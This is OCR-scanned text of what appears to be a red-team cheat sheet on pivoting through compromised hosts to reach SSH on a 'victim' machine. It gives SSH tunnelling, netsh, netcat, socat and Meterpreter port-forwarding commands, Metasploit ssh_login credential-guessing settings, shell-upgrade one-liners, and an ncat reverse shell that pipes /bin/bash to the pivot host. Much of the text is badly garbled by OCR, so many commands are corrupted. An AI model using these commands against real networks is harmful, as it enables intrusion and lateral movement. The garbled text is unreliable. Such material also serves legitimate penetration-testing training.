eed pivot netsh interface portproxy add vatov4 Listenport=4000 Listenaddress=0.0.0.0 connectport=22 connectaddres er 9 gh victimadmin@pivot. tgt victim. tgt Ce ea) ‘SH tral through Linux ker s sah pivotAdmingpivot.tgt pL ssh victimAdmingvictim. tgt PowerShell sessions through Windows: 2 P Enter- PsSession ~CouputerNane pivot. tgt (r ROP session over Windows Iv:Pivot.tgt psexec.exe Now, with command execution on pivot: ivot ash victimadminvictim, tgt No SSH available? How about PUTTY? Note that even if all the host in the chain run Windows, you ean’ typically sSession twvice because of how credentials are used. Run asearch for pesession double for more info Cee) python -c ‘import pty; pty. spawn("/bin/bash") ruby -e ‘exec "/bin/sh" Mbin/sh ~i or /bin/bash ~i perl -e ‘exec "/bin/sh’ Further Upgrade Ugly Shells Things seem off? Sometimes this can return functionality like arcow keys in a shell ° z 5 stty raw -echo er 3 fg 9 reset export. SHELL=bash 9 export TERM=xtern- stty rows 40 columns eee ssion -S hacking Session fais Regain session, THEN: oti § session -r hacking Want mote fu > jonality than s Check out tm Is your connection not stable enough for 7 mosth is more forgiving of spotty Manage Many SSH Connections Check out Pronylump and. manage a wide array of connections a) fale QS oP ERATIONS a Gene) Ny Wick i Purpose Navigating a clent/vitim environment often requires pivoting from target to target, and there are many ways to do so. This cheat sheet runs through various options for Giferent environments and situations. Find @ method that may fit your situation. In each, we model an attacker pivoting through pivot to reach SSH on victim. Substitute hosts ané ports to ft your need, Pay attention to prompts as they will identify the hast where the command should be run AND what type of prompt, ie. Windows cmd.exe (c: \>), Powershell (23), or Linux (5 or ). The diagram in the center should help. Replace termslike victimAdmin and ict with appropriate credentials forthe given system. On the back, there are some extra goodies like how to upgrade an ugly Neteat shel to something that feels more ikea eal Bash Have fun, good luck, and pivot mercilessly!SsHPvotsRequireansshdseting [PStustion BL MaterpreterPor Forward SetGatewayPorts yes in 4g, then) t # systemctl restart sshd Ere) setackes $ ash ~£NL 1337 :victim. tot :22 pivoterépivot.tgt stacker § ssh victimadmintlocalhost -P 1337 Snr) iyot § eh -£NR 1337:victim. tgt:22 attackerGattacker.tgt seeackes $ aah victimadnin@localhost -P 1337 ker § ssh pivotadningpivot.tgt -D 9050 - 6 attacks: $ proxychains ash victimadmintvictin. tgt And check /etc/proxychais £ peer ee an =£ put ssh in the background after connecting -¥ don’t some ports =P. num use “num” port for ssh ecute a command; just forward You need to access SSH on port 22 of victim, but you can’t go directly due to those meddling firewalls. For simplicity, thls sheet will generally be using ports 1337, 4000, and 22 on the Attacker, Pwot, and Victim machines victim.tgt citi =? pivot.tgt | 0 | attacker.tgt Netcat Port Forward Sed /tmp && mknod backpipe Pp i ne -1vp 4000 Ocbackpipe | no -v victim.tgt 22 L>backpipe acker $ ssh victimadningpivot.tgt -P 4000 Tr Meterpreter > port fwd add -1 4000 -p 22 -r victim, tgt ker § seh victimadmingpivot.tgt -P 4000 Ree es pivot Meter un post/multi /manage/autoroute SUBNET=pivotSubnet CMD=add pivot Ustezpreter > background scanner/ssh/ssh_login set RHOSTS victim. tgt P set USERNAME victimadmin pivot msf > set PASSWORD victimPase Senior) pivot § socat TCP- LISTEN: 4000, fork ‘Tep:victim. tgt:22 er 9 sh victimadmingpivet.tgt -P 4000 ear ‘Assumes code execution on victim y t vip 4 it neat pivot. tgt 4000 - [oin/bash neat pivot.tgt 4000